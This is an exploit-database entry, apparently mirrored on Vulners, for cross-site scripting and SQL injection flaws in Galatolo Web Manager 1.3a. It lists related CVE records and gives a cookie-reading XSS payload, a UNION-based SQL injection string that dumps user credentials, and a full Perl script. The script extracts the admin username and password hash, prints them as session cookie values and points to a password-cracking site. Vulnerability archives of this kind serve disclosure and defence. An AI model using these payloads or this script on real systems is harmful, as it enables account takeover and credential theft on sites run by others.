Lucene search
+L

Galatolo Web Manager 1.3a - Cross-Site Scripting / SQL Injection

🗓️ 15 Jul 2008 00:00:00Reported by StAkeRType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

Galatolo Web Manager 1.3a exposes XSS and SQL Injection vulnerabilities affecting user data access.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6248
15 Jul 200800:00
circl
circl
Circl
CVE-2008-6249
15 Jul 200800:00
circl
cve
CVE
CVE-2008-6248
23 Feb 200917:00
cve
cve
CVE
CVE-2008-6249
23 Feb 200917:00
cve
cvelist
Cvelist
CVE-2008-6248
23 Feb 200917:00
cvelist
cvelist
Cvelist
CVE-2008-6249
23 Feb 200917:00
cvelist
euvd
EUVD
EUVD-2008-6218
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2008-6219
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-6248
23 Feb 200917:30
nvd
nvd
NVD
CVE-2008-6249
23 Feb 200917:30
nvd
Rows per page
--==+============================================================================+==--
--==+   Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability    +==--
--==+============================================================================+==--

 [*] Discovered By: StAkeR ~ [email protected]
 [+] Discovered On: 14 Jul 2008
 [+] Download: http://gwm.dev-area.org/view.php?id=8

 [*] Vulnerabilities:

 [*] XSS <= 1.3a
 [+] all.php?tag= [Code Javascript]
 [+] http://site.com/all.php?tag=<script>alert(document.cookie)</script>

 [*] SQL (plugin users) 1.3a
 [+] plugins/users/index.php?id= [Code SQL]
 [+] -1+union+select+null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version())+from+users+where+id=1--

 [*] Exploit:

 #!/usr/bin/perl
 use strict;
 use LWP::UserAgent;

 my $host = shift;
 my ($start,$content,@login);
 my $evilxx = "/plugins/users/index.php?id=-1+union+select+1,concat(0x25,user,0x25,pass),null,null+from+users+where+id=1--";

 if($host =~ /^http:\/\/?/i)
 {
   $start = new LWP::UserAgent or die "[+] Unable to connect\n";
   $start->timeout(1);
   $start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
   $content = $start->get($host.$evilxx);

   if($content->is_success)
   {
     if($content->content =~ /%(.+?)%([0-9a-f]{32})/)
     {
       push(@login,$1,$2);
       print "[+] Login:\n";
       print "[+] Username: $login[0]\n";
       print "[+] Password: $login[1]\n\n";

       print "[+] Cookie Session:\n";
       print "[+] gwm_user = $login[0]\n";
       print "[+] gwm_pass = $login[1]\n\n";

       print "[+] Crack Password:\n";
       print "[+] md5(md5(password)) for crack:\n";
       print "[+] http://passcracking.com\n";
     }
     else
     {
       print "[+] Exploit Failed\n";
       print "[+] Site Not Vulnerable\n";
     }
   }
 }
 else
 {
   print "[+] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection\n";
   print "[+] Exploit Coded By: StAkeR ~ StAkeR\@hotmail.it\n\n";
   print "[+] Usage: Perl $0 <host>\n";
   print "[+] Usage: Perl $0 http://site.com\n";
 }

# milw0rm.com [2008-07-15]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jul 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01453
37